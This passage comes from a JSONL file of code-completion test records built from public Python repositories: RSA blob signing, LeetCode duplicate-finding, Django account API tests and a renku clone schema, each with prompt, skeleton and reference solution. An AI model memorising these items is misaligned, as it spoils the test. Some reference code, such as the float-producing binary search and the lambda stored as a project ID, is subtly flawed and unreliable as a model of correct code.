Sign(self, data, signing_key, verify_key=None):\n \"\"\"Use the data to sign this blob. Args: data: String containing the blob data. signing_key: The key to sign with. verify_key: Key to verify with. If None we assume the signing key also contains the public key. Returns: self for call chaining.\"\"\"\n if signing_key.KeyLen() < 2048:\n logging.warning('signing key is too short.')\n self.signature = signing_key.Sign(data)\n self.signature_type = self.SignatureType.RSA_PKCS1v15\n self.digest = hashlib.sha256(data).digest()\n self.digest_type = self.HashType.SHA256\n self.data = data\n if verify_key is None:\n verify_key = signing_key.GetPublicKey()\n self.Verify(verify_key)\n return self\n", "source": "the_stack_v2_python_sparse", "source_path": "grr/core/grr_response_core/lib/rdfvalues/crypto.py", "source_repo": "google/grr", "split": "test", "star_events_count": 4683} {"blob_id": "26e18ad67eca384933d7128193e1b72cb95fb89a", "bodies": ["for val in nums:\n val = abs(val)\n if nums[val - 1] < 0:\n return val\n else:\n nums[val - 1] = -nums[val - 1]\nraise ValueError", "head = 0\ntail = len(nums) - 1\nwhile head < tail:\n mid = (tail - head) / 2 + head\n count = 0\n for num in nums:\n if num <= mid:\n count += 1\n if count > mid:\n tail = mid\n else:\n head = mid + 1\nreturn head"], "bodies_text": "<|body_start_0|>\n for val in nums:\n val = abs(val)\n if nums[val - 1] < 0:\n return val\n else:\n nums[val - 1] = -nums[val - 1]\n raise ValueError\n<|end_body_0|>\n\n<|body_start_1|>\n head = 0\n tail = len(nums) - 1\n while head < tail:\n mid = (tail - head) / 2 + head\n count = 0\n for num in nums:\n if num <= mid:\n count += 1\n if count > mid:\n tail = mid\n else:\n head = mid + 1\n return head\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def findDuplicate(self, nums):\n \"\"\"Since the element range will fit in the arr index range, and all value are positive, we can use the convert the value from positive to negative and negative value indicates that this index as a elemeng is seen already. Usually then asked for space complexity O(1), you need to modify the arr or matrix and at the same time loose no entropy of it. :type nums: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def findDuplicateBinarySearch(self, nums):\n \"\"\"Binary search with no extra space. For index mid, which mapps to number mid + 1, count how many numbers in this array are smaller than mid + 1(<= mid). If counter is larger than mid(count >= mid + 1), that means duplicate one is larger than mid. Note that this this case the index is value.(index + 1 = value)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for val in nums:\n val = abs(val)\n if nums[val - 1] < 0:\n return val\n else:\n nums[val - 1] = -nums[val - 1]\n raise ValueError\n<|end_body_0|>\n\n<|body_start_1|>\n head = 0\n tail = len(nums) - 1\n while head < tail:\n mid = (tail - head) / 2 + head\n count = 0\n for num in nums:\n if num <= mid:\n count += 1\n if count > mid:\n tail = mid\n else:\n head = mid + 1\n return head\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000435", "length_bytes": 2401, "license_type": "no_license", "methods": [{"docstring": "Since the element range will fit in the arr index range, and all value are positive, we can use the convert the value from positive to negative and negative value indicates that this index as a elemeng is seen already. Usually then asked for space complexity O(1), you need to modify the arr or matrix and at the same time loose no entropy of it. :type nums: List[int] :rtype: int", "name": "findDuplicate", "signature": "def findDuplicate(self, nums)"}, {"docstring": "Binary search with no extra space. For index mid, which mapps to number mid + 1, count how many numbers in this array are smaller than mid + 1(<= mid). If counter is larger than mid(count >= mid + 1), that means duplicate one is larger than mid. Note that this this case the index is value.(index + 1 = value)", "name": "findDuplicateBinarySearch", "signature": "def findDuplicateBinarySearch(self, nums)"}], "n_methods": 2, "prompt": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def findDuplicate(self, nums): Since the element range will fit in the arr index range, and all value are positive, we can use the convert the value from positive to negative and negative value indicates that this index as a elemeng is seen already. Usually then asked for space complexity O(1), you need to modify the arr or matrix and at the same time loose no entropy of it. :type nums: List[int] :rtype: int\n- def findDuplicateBinarySearch(self, nums): Binary search with no extra space. For index mid, which mapps to number mid + 1, count how many numbers in this array are smaller than mid + 1(<= mid). If counter is larger than mid(count >= mid + 1), that means duplicate one is larger than mid. Note that this this case the index is value.(index + 1 = value)", "prompted_full_text": "Implement the Python class `Solution` described below.\n\nClass description:\nImplement the Solution class.\n\nMethod signatures and docstrings:\n- def findDuplicate(self, nums): Since the element range will fit in the arr index range, and all value are positive, we can use the convert the value from positive to negative and negative value indicates that this index as a elemeng is seen already. Usually then asked for space complexity O(1), you need to modify the arr or matrix and at the same time loose no entropy of it. :type nums: List[int] :rtype: int\n- def findDuplicateBinarySearch(self, nums): Binary search with no extra space. For index mid, which mapps to number mid + 1, count how many numbers in this array are smaller than mid + 1(<= mid). If counter is larger than mid(count >= mid + 1), that means duplicate one is larger than mid. Note that this this case the index is value.(index + 1 = value)\n\n<|skeleton|>\nclass Solution:\n\n def findDuplicate(self, nums):\n \"\"\"Since the element range will fit in the arr index range, and all value are positive, we can use the convert the value from positive to negative and negative value indicates that this index as a elemeng is seen already. Usually then asked for space complexity O(1), you need to modify the arr or matrix and at the same time loose no entropy of it. :type nums: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def findDuplicateBinarySearch(self, nums):\n \"\"\"Binary search with no extra space. For index mid, which mapps to number mid + 1, count how many numbers in this array are smaller than mid + 1(<= mid). If counter is larger than mid(count >= mid + 1), that means duplicate one is larger than mid. Note that this this case the index is value.(index + 1 = value)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n for val in nums:\n val = abs(val)\n if nums[val - 1] < 0:\n return val\n else:\n nums[val - 1] = -nums[val - 1]\n raise ValueError\n<|end_body_0|>\n\n<|body_start_1|>\n head = 0\n tail = len(nums) - 1\n while head < tail:\n mid = (tail - head) / 2 + head\n count = 0\n for num in nums:\n if num <= mid:\n count += 1\n if count > mid:\n tail = mid\n else:\n head = mid + 1\n return head\n<|end_body_1|>\n", "revision_id": "33c623f226981942780751554f0593f2c71cf458", "skeleton": "<|skeleton|>\nclass Solution:\n\n def findDuplicate(self, nums):\n \"\"\"Since the element range will fit in the arr index range, and all value are positive, we can use the convert the value from positive to negative and negative value indicates that this index as a elemeng is seen already. Usually then asked for space complexity O(1), you need to modify the arr or matrix and at the same time loose no entropy of it. :type nums: List[int] :rtype: int\"\"\"\n <|body_0|>\n\n def findDuplicateBinarySearch(self, nums):\n \"\"\"Binary search with no extra space. For index mid, which mapps to number mid + 1, count how many numbers in this array are smaller than mid + 1(<= mid). If counter is larger than mid(count >= mid + 1), that means duplicate one is larger than mid. Note that this this case the index is value.(index + 1 = value)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class Solution:\n def findDuplicate(self, nums):\n \"\"\"Since the element range will fit in the arr index range, and all value are positive, we can use the convert the value from positive to negative and negative value indicates that this index as a elemeng is seen already. Usually then asked for space complexity O(1), you need to modify the arr or matrix and at the same time loose no entropy of it. :type nums: List[int] :rtype: int\"\"\"\n for val in nums:\n val = abs(val)\n if nums[val - 1] < 0:\n return val\n else:\n nums[val - 1] = -nums[val - 1]\n raise ValueError\n\n def findDuplicateBinarySearch(self, nums):\n \"\"\"Binary search with no extra space. For index mid, which mapps to number mid + 1, count how many numbers in this array are smaller than mid + 1(<= mid). If counter is larger than mid(count >= mid + 1), that means duplicate one is larger than mid. Note that this this case the index is value.(index + 1 = value)\"\"\"\n head = 0\n tail = len(nums) - 1\n while head < tail:\n mid = (tail - head) / 2 + head\n count = 0\n for num in nums:\n if num <= mid:\n count += 1\n if count > mid:\n tail = mid\n else:\n head = mid + 1\n return head\n", "source": "the_stack_v2_python_sparse", "source_path": "search/leetcode_Find_The_Duplicate_Number.py", "source_repo": "monkeylyf/interviewjam", "split": "test", "star_events_count": 59} {"blob_id": "caeaf1d808ac9917645b985392db23e63befdf42", "bodies": ["url = reverse('user-account-detail', args=[self.username])\nself.token_login()\nrequest = self.c.get(path=url, content_type='application/json', **self.client_header)\nself.assertEqual(request.status_code, status.HTTP_200_OK)", "url = reverse('user-account-detail', args=['hededsfd'])\nself.token_login()\nrequest = self.c.get(path=url, content_type='application/json', **self.client_header)\nself.assertEqual(request.status_code, status.HTTP_404_NOT_FOUND)", "url = reverse('user-account-detail', args=[self.username])\nself.token_login()\nrequest = self.c.delete(path=url, content_type='application/json', **self.client_header)\nself.assertEqual(request.status_code, status.HTTP_204_NO_CONTENT)", "user = User.objects.create_user(username='hede', password='hede')\nurl = reverse('user-account-detail', args=[user.username])\nself.token_login()\nrequest = self.c.delete(path=url, content_type='application/json', **self.client_header)\nself.assertEqual(request.status_code, status.HTTP_403_FORBIDDEN)", "url = reverse('user-account-detail', args=[self.username])\nself.token_login()\ndata = UserDetailSerializer(instance=self.u).data\ndata['gender'] = User.MALE\ndata.pop('background')\ndata.pop('avatar')\nrequest = self.c.put(path=url, data=simplejson.dumps(data), content_type='application/json', **self.client_header)\nself.assertEqual(request.status_code, status.HTTP_200_OK)\nself.assertEqual(data['gender'], User.objects.get(username=self.username).gender)", "url = reverse('user-change-password', args=[self.username])\nself.token_login()\ndata = {'password': self.password, 'new_password': 'testtest', 'confirm_password': 'testtest'}\nrequest = self.c.patch(url, data=simplejson.dumps(data), content_type='application/json', **self.client_header)\nself.assertEqual(request.status_code, status.HTTP_200_OK)\nnew_user = User.objects.get(username=self.username)\nself.assertNotEqual(self.u.password, new_user.password)"], "bodies_text": "<|body_start_0|>\n url = reverse('user-account-detail', args=[self.username])\n self.token_login()\n request = self.c.get(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_200_OK)\n<|end_body_0|>\n\n<|body_start_1|>\n url = reverse('user-account-detail', args=['hededsfd'])\n self.token_login()\n request = self.c.get(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_404_NOT_FOUND)\n<|end_body_1|>\n\n<|body_start_2|>\n url = reverse('user-account-detail', args=[self.username])\n self.token_login()\n request = self.c.delete(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_204_NO_CONTENT)\n<|end_body_2|>\n\n<|body_start_3|>\n user = User.objects.create_user(username='hede', password='hede')\n url = reverse('user-account-detail', args=[user.username])\n self.token_login()\n request = self.c.delete(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_403_FORBIDDEN)\n<|end_body_3|>\n\n<|body_start_4|>\n url = reverse('user-account-detail', args=[self.username])\n self.token_login()\n data = UserDetailSerializer(instance=self.u).data\n data['gender'] = User.MALE\n data.pop('background')\n data.pop('avatar')\n request = self.c.put(path=url, data=simplejson.dumps(data), content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_200_OK)\n self.assertEqual(data['gender'], User.objects.get(username=self.username).gender)\n<|end_body_4|>\n\n<|body_start_5|>\n url = reverse('user-change-password', args=[self.username])\n self.token_login()\n data = {'password': self.password, 'new_password': 'testtest', 'confirm_password': 'testtest'}\n request = self.c.patch(url, data=simplejson.dumps(data), content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_200_OK)\n new_user = User.objects.get(username=self.username)\n self.assertNotEqual(self.u.password, new_user.password)\n<|end_body_5|>\n", "class_docstring": "", "class_name": "UserAccountTestCase", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass UserAccountTestCase:\n\n def test_account_detail(self):\n \"\"\"User Account Detail\"\"\"\n <|body_0|>\n\n def test_invalid_account_detail(self):\n \"\"\"Username invalid\"\"\"\n <|body_1|>\n\n def test_account_delete(self):\n \"\"\"User Account Delete\"\"\"\n <|body_2|>\n\n def test_other_account_delete(self):\n \"\"\"You can only delete itself\"\"\"\n <|body_3|>\n\n def test_account_update(self):\n \"\"\"User Account Update\"\"\"\n <|body_4|>\n\n def test_account_password_update(self):\n \"\"\"User Account Password Update\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n url = reverse('user-account-detail', args=[self.username])\n self.token_login()\n request = self.c.get(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_200_OK)\n<|end_body_0|>\n\n<|body_start_1|>\n url = reverse('user-account-detail', args=['hededsfd'])\n self.token_login()\n request = self.c.get(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_404_NOT_FOUND)\n<|end_body_1|>\n\n<|body_start_2|>\n url = reverse('user-account-detail', args=[self.username])\n self.token_login()\n request = self.c.delete(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_204_NO_CONTENT)\n<|end_body_2|>\n\n<|body_start_3|>\n user = User.objects.create_user(username='hede', password='hede')\n url = reverse('user-account-detail', args=[user.username])\n self.token_login()\n request = self.c.delete(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_403_FORBIDDEN)\n<|end_body_3|>\n\n<|body_start_4|>\n url = reverse('user-account-detail', args=[self.username])\n self.token_login()\n data = UserDetailSerializer(instance=self.u).data\n data['gender'] = User.MALE\n data.pop('background')\n data.pop('avatar')\n request = self.c.put(path=url, data=simplejson.dumps(data), content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_200_OK)\n self.assertEqual(data['gender'], User.objects.get(username=self.username).gender)\n<|end_body_4|>\n\n<|body_start_5|>\n url = reverse('user-change-password', args=[self.username])\n self.token_login()\n data = {'password': self.password, 'new_password': 'testtest', 'confirm_password': 'testtest'}\n request = self.c.patch(url, data=simplejson.dumps(data), content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_200_OK)\n new_user = User.objects.get(username=self.username)\n self.assertNotEqual(self.u.password, new_user.password)\n<|end_body_5|>\n", "id": "stack_v2_sparse_classes_10k_test_000436", "length_bytes": 10007, "license_type": "no_license", "methods": [{"docstring": "User Account Detail", "name": "test_account_detail", "signature": "def test_account_detail(self)"}, {"docstring": "Username invalid", "name": "test_invalid_account_detail", "signature": "def test_invalid_account_detail(self)"}, {"docstring": "User Account Delete", "name": "test_account_delete", "signature": "def test_account_delete(self)"}, {"docstring": "You can only delete itself", "name": "test_other_account_delete", "signature": "def test_other_account_delete(self)"}, {"docstring": "User Account Update", "name": "test_account_update", "signature": "def test_account_update(self)"}, {"docstring": "User Account Password Update", "name": "test_account_password_update", "signature": "def test_account_password_update(self)"}], "n_methods": 6, "original_id": "stack_v2_sparse_classes_30k_val_000207", "prompt": "Implement the Python class `UserAccountTestCase` described below.\n\nClass description:\nImplement the UserAccountTestCase class.\n\nMethod signatures and docstrings:\n- def test_account_detail(self): User Account Detail\n- def test_invalid_account_detail(self): Username invalid\n- def test_account_delete(self): User Account Delete\n- def test_other_account_delete(self): You can only delete itself\n- def test_account_update(self): User Account Update\n- def test_account_password_update(self): User Account Password Update", "prompted_full_text": "Implement the Python class `UserAccountTestCase` described below.\n\nClass description:\nImplement the UserAccountTestCase class.\n\nMethod signatures and docstrings:\n- def test_account_detail(self): User Account Detail\n- def test_invalid_account_detail(self): Username invalid\n- def test_account_delete(self): User Account Delete\n- def test_other_account_delete(self): You can only delete itself\n- def test_account_update(self): User Account Update\n- def test_account_password_update(self): User Account Password Update\n\n<|skeleton|>\nclass UserAccountTestCase:\n\n def test_account_detail(self):\n \"\"\"User Account Detail\"\"\"\n <|body_0|>\n\n def test_invalid_account_detail(self):\n \"\"\"Username invalid\"\"\"\n <|body_1|>\n\n def test_account_delete(self):\n \"\"\"User Account Delete\"\"\"\n <|body_2|>\n\n def test_other_account_delete(self):\n \"\"\"You can only delete itself\"\"\"\n <|body_3|>\n\n def test_account_update(self):\n \"\"\"User Account Update\"\"\"\n <|body_4|>\n\n def test_account_password_update(self):\n \"\"\"User Account Password Update\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n url = reverse('user-account-detail', args=[self.username])\n self.token_login()\n request = self.c.get(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_200_OK)\n<|end_body_0|>\n\n<|body_start_1|>\n url = reverse('user-account-detail', args=['hededsfd'])\n self.token_login()\n request = self.c.get(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_404_NOT_FOUND)\n<|end_body_1|>\n\n<|body_start_2|>\n url = reverse('user-account-detail', args=[self.username])\n self.token_login()\n request = self.c.delete(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_204_NO_CONTENT)\n<|end_body_2|>\n\n<|body_start_3|>\n user = User.objects.create_user(username='hede', password='hede')\n url = reverse('user-account-detail', args=[user.username])\n self.token_login()\n request = self.c.delete(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_403_FORBIDDEN)\n<|end_body_3|>\n\n<|body_start_4|>\n url = reverse('user-account-detail', args=[self.username])\n self.token_login()\n data = UserDetailSerializer(instance=self.u).data\n data['gender'] = User.MALE\n data.pop('background')\n data.pop('avatar')\n request = self.c.put(path=url, data=simplejson.dumps(data), content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_200_OK)\n self.assertEqual(data['gender'], User.objects.get(username=self.username).gender)\n<|end_body_4|>\n\n<|body_start_5|>\n url = reverse('user-change-password', args=[self.username])\n self.token_login()\n data = {'password': self.password, 'new_password': 'testtest', 'confirm_password': 'testtest'}\n request = self.c.patch(url, data=simplejson.dumps(data), content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_200_OK)\n new_user = User.objects.get(username=self.username)\n self.assertNotEqual(self.u.password, new_user.password)\n<|end_body_5|>\n", "revision_id": "b8ba25fdde5d4ee92a3f73cb42ff892ed436d3f2", "skeleton": "<|skeleton|>\nclass UserAccountTestCase:\n\n def test_account_detail(self):\n \"\"\"User Account Detail\"\"\"\n <|body_0|>\n\n def test_invalid_account_detail(self):\n \"\"\"Username invalid\"\"\"\n <|body_1|>\n\n def test_account_delete(self):\n \"\"\"User Account Delete\"\"\"\n <|body_2|>\n\n def test_other_account_delete(self):\n \"\"\"You can only delete itself\"\"\"\n <|body_3|>\n\n def test_account_update(self):\n \"\"\"User Account Update\"\"\"\n <|body_4|>\n\n def test_account_password_update(self):\n \"\"\"User Account Password Update\"\"\"\n <|body_5|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class UserAccountTestCase:\n def test_account_detail(self):\n \"\"\"User Account Detail\"\"\"\n url = reverse('user-account-detail', args=[self.username])\n self.token_login()\n request = self.c.get(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_200_OK)\n\n def test_invalid_account_detail(self):\n \"\"\"Username invalid\"\"\"\n url = reverse('user-account-detail', args=['hededsfd'])\n self.token_login()\n request = self.c.get(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_404_NOT_FOUND)\n\n def test_account_delete(self):\n \"\"\"User Account Delete\"\"\"\n url = reverse('user-account-detail', args=[self.username])\n self.token_login()\n request = self.c.delete(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_204_NO_CONTENT)\n\n def test_other_account_delete(self):\n \"\"\"You can only delete itself\"\"\"\n user = User.objects.create_user(username='hede', password='hede')\n url = reverse('user-account-detail', args=[user.username])\n self.token_login()\n request = self.c.delete(path=url, content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_403_FORBIDDEN)\n\n def test_account_update(self):\n \"\"\"User Account Update\"\"\"\n url = reverse('user-account-detail', args=[self.username])\n self.token_login()\n data = UserDetailSerializer(instance=self.u).data\n data['gender'] = User.MALE\n data.pop('background')\n data.pop('avatar')\n request = self.c.put(path=url, data=simplejson.dumps(data), content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_200_OK)\n self.assertEqual(data['gender'], User.objects.get(username=self.username).gender)\n\n def test_account_password_update(self):\n \"\"\"User Account Password Update\"\"\"\n url = reverse('user-change-password', args=[self.username])\n self.token_login()\n data = {'password': self.password, 'new_password': 'testtest', 'confirm_password': 'testtest'}\n request = self.c.patch(url, data=simplejson.dumps(data), content_type='application/json', **self.client_header)\n self.assertEqual(request.status_code, status.HTTP_200_OK)\n new_user = User.objects.get(username=self.username)\n self.assertNotEqual(self.u.password, new_user.password)\n", "source": "the_stack_v2_python_sparse", "source_path": "chatproject/apps/account/tests.py", "source_repo": "QilinGu/chat-project", "split": "test", "star_events_count": 0} {"blob_id": "7c0594018cb01fd001d9aa07898cf64629ce10b8", "bodies": ["if not data.get('project_id'):\n data['project_id'] = lambda: uuid.uuid4().hex\nreturn data", "try:\n git_url = GitURL.parse(data['git_url'])\nexcept UnicodeError as e:\n raise ValidationError('`git_url` contains unsupported characters') from e\nexcept ConfigurationError as e:\n raise ValidationError('Invalid `git_url`') from e\nif git_url.owner is None:\n raise ValidationError('Invalid `git_url`')\ndata['owner'] = git_url.owner\nif git_url.name is None:\n raise ValidationError('Invalid `git_url`')\ndata['name'] = git_url.name\ndata['slug'] = normalize_to_ascii(data['name'])\nreturn data", "git_url = urlparse(data['git_url'])\nurl = 'oauth2:{0}@{1}'.format(data['token'], git_url.netloc)\nreturn git_url._replace(netloc=url).geturl()", "data['url_with_auth'] = self.format_url(data)\nif not data['depth']:\n data['depth'] = PROJECT_CLONE_DEPTH_DEFAULT\ntry:\n depth = int(data['depth'])\n if depth < 0:\n data['depth'] = None\nexcept ValueError:\n data['depth'] = PROJECT_CLONE_DEPTH_DEFAULT\nreturn data"], "bodies_text": "<|body_start_0|>\n if not data.get('project_id'):\n data['project_id'] = lambda: uuid.uuid4().hex\n return data\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n git_url = GitURL.parse(data['git_url'])\n except UnicodeError as e:\n raise ValidationError('`git_url` contains unsupported characters') from e\n except ConfigurationError as e:\n raise ValidationError('Invalid `git_url`') from e\n if git_url.owner is None:\n raise ValidationError('Invalid `git_url`')\n data['owner'] = git_url.owner\n if git_url.name is None:\n raise ValidationError('Invalid `git_url`')\n data['name'] = git_url.name\n data['slug'] = normalize_to_ascii(data['name'])\n return data\n<|end_body_1|>\n\n<|body_start_2|>\n git_url = urlparse(data['git_url'])\n url = 'oauth2:{0}@{1}'.format(data['token'], git_url.netloc)\n return git_url._replace(netloc=url).geturl()\n<|end_body_2|>\n\n<|body_start_3|>\n data['url_with_auth'] = self.format_url(data)\n if not data['depth']:\n data['depth'] = PROJECT_CLONE_DEPTH_DEFAULT\n try:\n depth = int(data['depth'])\n if depth < 0:\n data['depth'] = None\n except ValueError:\n data['depth'] = PROJECT_CLONE_DEPTH_DEFAULT\n return data\n<|end_body_3|>\n", "class_docstring": "Context schema for project clone.", "class_name": "ProjectCloneContext", "detected_licenses": ["Apache-2.0", "Python-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ProjectCloneContext:\n \"\"\"Context schema for project clone.\"\"\"\n\n def set_missing_id(self, data, **kwargs):\n \"\"\"Set project_id when missing.\"\"\"\n <|body_0|>\n\n def set_owner_name(self, data, **kwargs):\n \"\"\"Set owner and name fields.\"\"\"\n <|body_1|>\n\n def format_url(self, data):\n \"\"\"Format url with auth.\"\"\"\n <|body_2|>\n\n def finalize_data(self, data, **kwargs):\n \"\"\"Finalize data.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not data.get('project_id'):\n data['project_id'] = lambda: uuid.uuid4().hex\n return data\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n git_url = GitURL.parse(data['git_url'])\n except UnicodeError as e:\n raise ValidationError('`git_url` contains unsupported characters') from e\n except ConfigurationError as e:\n raise ValidationError('Invalid `git_url`') from e\n if git_url.owner is None:\n raise ValidationError('Invalid `git_url`')\n data['owner'] = git_url.owner\n if git_url.name is None:\n raise ValidationError('Invalid `git_url`')\n data['name'] = git_url.name\n data['slug'] = normalize_to_ascii(data['name'])\n return data\n<|end_body_1|>\n\n<|body_start_2|>\n git_url = urlparse(data['git_url'])\n url = 'oauth2:{0}@{1}'.format(data['token'], git_url.netloc)\n return git_url._replace(netloc=url).geturl()\n<|end_body_2|>\n\n<|body_start_3|>\n data['url_with_auth'] = self.format_url(data)\n if not data['depth']:\n data['depth'] = PROJECT_CLONE_DEPTH_DEFAULT\n try:\n depth = int(data['depth'])\n if depth < 0:\n data['depth'] = None\n except ValueError:\n data['depth'] = PROJECT_CLONE_DEPTH_DEFAULT\n return data\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000437", "length_bytes": 7933, "license_type": "permissive", "methods": [{"docstring": "Set project_id when missing.", "name": "set_missing_id", "signature": "def set_missing_id(self, data, **kwargs)"}, {"docstring": "Set owner and name fields.", "name": "set_owner_name", "signature": "def set_owner_name(self, data, **kwargs)"}, {"docstring": "Format url with auth.", "name": "format_url", "signature": "def format_url(self, data)"}, {"docstring": "Finalize data.", "name": "finalize_data", "signature": "def finalize_data(self, data, **kwargs)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_006299", "prompt": "Implement the Python class `ProjectCloneContext` described below.\n\nClass description:\nContext schema for project clone.\n\nMethod signatures and docstrings:\n- def set_missing_id(self, data, **kwargs): Set project_id when missing.\n- def set_owner_name(self, data, **kwargs): Set owner and name fields.\n- def format_url(self, data): Format url with auth.\n- def finalize_data(self, data, **kwargs): Finalize data.", "prompted_full_text": "Implement the Python class `ProjectCloneContext` described below.\n\nClass description:\nContext schema for project clone.\n\nMethod signatures and docstrings:\n- def set_missing_id(self, data, **kwargs): Set project_id when missing.\n- def set_owner_name(self, data, **kwargs): Set owner and name fields.\n- def format_url(self, data): Format url with auth.\n- def finalize_data(self, data, **kwargs): Finalize data.\n\n<|skeleton|>\nclass ProjectCloneContext:\n \"\"\"Context schema for project clone.\"\"\"\n\n def set_missing_id(self, data, **kwargs):\n \"\"\"Set project_id when missing.\"\"\"\n <|body_0|>\n\n def set_owner_name(self, data, **kwargs):\n \"\"\"Set owner and name fields.\"\"\"\n <|body_1|>\n\n def format_url(self, data):\n \"\"\"Format url with auth.\"\"\"\n <|body_2|>\n\n def finalize_data(self, data, **kwargs):\n \"\"\"Finalize data.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if not data.get('project_id'):\n data['project_id'] = lambda: uuid.uuid4().hex\n return data\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n git_url = GitURL.parse(data['git_url'])\n except UnicodeError as e:\n raise ValidationError('`git_url` contains unsupported characters') from e\n except ConfigurationError as e:\n raise ValidationError('Invalid `git_url`') from e\n if git_url.owner is None:\n raise ValidationError('Invalid `git_url`')\n data['owner'] = git_url.owner\n if git_url.name is None:\n raise ValidationError('Invalid `git_url`')\n data['name'] = git_url.name\n data['slug'] = normalize_to_ascii(data['name'])\n return data\n<|end_body_1|>\n\n<|body_start_2|>\n git_url = urlparse(data['git_url'])\n url = 'oauth2:{0}@{1}'.format(data['token'], git_url.netloc)\n return git_url._replace(netloc=url).geturl()\n<|end_body_2|>\n\n<|body_start_3|>\n data['url_with_auth'] = self.format_url(data)\n if not data['depth']:\n data['depth'] = PROJECT_CLONE_DEPTH_DEFAULT\n try:\n depth = int(data['depth'])\n if depth < 0:\n data['depth'] = None\n except ValueError:\n data['depth'] = PROJECT_CLONE_DEPTH_DEFAULT\n return data\n<|end_body_3|>\n", "revision_id": "449ec7bca1cc435e5a8ceb278e49a422b953bb09", "skeleton": "<|skeleton|>\nclass ProjectCloneContext:\n \"\"\"Context schema for project clone.\"\"\"\n\n def set_missing_id(self, data, **kwargs):\n \"\"\"Set project_id when missing.\"\"\"\n <|body_0|>\n\n def set_owner_name(self, data, **kwargs):\n \"\"\"Set owner and name fields.\"\"\"\n <|body_1|>\n\n def format_url(self, data):\n \"\"\"Format url with auth.\"\"\"\n <|body_2|>\n\n def finalize_data(self, data, **kwargs):\n \"\"\"Finalize data.\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ProjectCloneContext:\n \"\"\"Context schema for project clone.\"\"\"\n\n def set_missing_id(self, data, **kwargs):\n \"\"\"Set project_id when missing.\"\"\"\n if not data.get('project_id'):\n data['project_id'] = lambda: uuid.uuid4().hex\n return data\n\n def set_owner_name(self, data, **kwargs):\n \"\"\"Set owner and name fields.\"\"\"\n try:\n git_url = GitURL.parse(data['git_url'])\n except UnicodeError as e:\n raise ValidationError('`git_url` contains unsupported characters') from e\n except ConfigurationError as e:\n raise ValidationError('Invalid `git_url`') from e\n if git_url.owner is None:\n raise ValidationError('Invalid `git_url`')\n data['owner'] = git_url.owner\n if git_url.name is None:\n raise ValidationError('Invalid `git_url`')\n data['name'] = git_url.name\n data['slug'] = normalize_to_ascii(data['name'])\n return data\n\n def format_url(self, data):\n \"\"\"Format url with auth.\"\"\"\n git_url = urlparse(data['git_url'])\n url = 'oauth2:{0}@{1}'.format(data['token'], git_url.netloc)\n return git_url._replace(netloc=url).geturl()\n\n def finalize_data(self, data, **kwargs):\n \"\"\"Finalize data.\"\"\"\n data['url_with_auth'] = self.format_url(data)\n if not data['depth']:\n data['depth'] = PROJECT_CLONE_DEPTH_DEFAULT\n try:\n depth = int(data['depth'])\n if depth < 0:\n data['depth'] = None\n except ValueError:\n data['depth'] = PROJECT_CLONE_DEPTH_DEFAULT\n return data\n", "source": "the_stack_v2_python_sparse", "source_path": "renku/service/serializers/cache.py", "source_repo": "code-inflation/renku-python", "split": "test", 